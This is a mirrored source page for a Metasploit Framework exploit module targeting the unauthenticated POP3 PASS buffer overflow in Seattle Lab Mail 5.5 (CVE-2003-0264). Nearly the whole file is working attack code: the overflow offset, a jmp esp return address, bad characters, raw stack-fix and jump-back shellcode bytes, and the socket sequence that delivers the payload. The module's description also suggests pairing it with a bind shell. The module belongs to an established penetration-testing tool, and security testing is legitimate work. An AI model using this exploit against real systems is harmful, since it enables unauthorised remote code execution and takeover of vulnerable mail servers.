Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/pop3/seattlelab_pass.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',

16
        'Description' => %q{

17
          There exists an unauthenticated buffer overflow vulnerability

18
          in the POP3 server of Seattle Lab Mail 5.5 when sending a password

19
          with excessive length.

20


21
          Successful exploitation should not crash either the

22
          service or the server; however, after initial use the

23
          port cannot be reused for successive exploitation until

24
          the service has been restarted. Consider using a command

25
          execution payload following the bind shell to restart

26
          the service if you need to reuse the same port.

27


28
          The overflow appears to occur in the debugging/error reporting

29
          section of the slmail.exe executable, and there are multiple

30
          offsets that will lead to successful exploitation. This exploit

31
          uses 2606, the offset that creates the smallest overall payload.

32
          The other offset is 4654.

33


34
          The return address is overwritten with a "jmp esp" call from the

35
          application library SLMFC.DLL found in %SYSTEM%\system32\. This

36
          return address works against all version of Windows and service packs.

37


38
          The last modification date on the library is dated 06/02/99. Assuming

39
          that the code where the overflow occurs has not changed in some time,

40
          prior version of SLMail may also be vulnerable with this exploit. The

41
          author has not been able to acquire older versions of SLMail for

42
          testing purposes. Please let us know if you were able to get this

43
          exploit working against other SLMail versions.

44
        },

45
        'Author' => 'stinko',

46
        'License' => MSF_LICENSE,

47
        'References' => [

48
          ['CVE', '2003-0264'],

49
          ['OSVDB', '11975'],

50
          ['BID', '7519'],

51
        ],

52
        'Privileged' => true,

53
        'DefaultOptions' => {

54
          'EXITFUNC' => 'thread',

55
        },

56
        'Payload' => {

57
          'Space' => 600,

58
          'BadChars' => "\x00\x0a\x0d\x20",

59
          'MinNops' => 100,

60
        },

61
        'Platform' => 'win',

62
        'Targets' => [

63
          ['Windows NT/2000/XP/2003 (SLMail 5.5)', { 'Ret' => 0x5f4a358f, 'Offset' => 2606 } ]

64
        ],

65
        'DisclosureDate' => '2003-05-07',

66
        'DefaultTarget' => 0,

67
        'Notes' => {

68
          'Reliability' => UNKNOWN_RELIABILITY,

69
          'Stability' => UNKNOWN_STABILITY,

70
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

71
        }

72
      )

73
    )

74


75
    register_options(

76
      [

77
        Opt::RPORT(110)

78
      ]

79
    )

80
  end

81


82
  def exploit

83
    connect

84


85
    print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")

86


87
    banner = sock.get_once || ''

88
    if banner !~ /^\+OK POP3 server (.*) ready/

89
      print_error("POP3 server does not appear to be running")

90
      return

91
    end

92


93
    sock.put("USER #{rand_text_alphanumeric(10)}\r\n")

94
    banner = sock.get_once

95
    if banner !~ /^\+OK (.*) welcome here/

96
      print_error("POP3 server rejected username")

97
      return

98
    end

99


100
    request = "PASS " + rand_text_alphanumeric(target['Offset'] - payload.encoded.length)

101
    request << payload.encoded

102
    request << [target.ret].pack('V')

103
    request << "\x81\xc4\xff\xef\xff\xff\x44" # fix the stack

104
    request << "\xe9\xcb\xfd\xff\xff"         # go back 560 bytes

105
    request << rand_text_alphanumeric(512) # cruft

106
    request << "\r\n"

107


108
    sock.put(request)

109


110
    handler

111
    disconnect

112
  end

113
end

114


115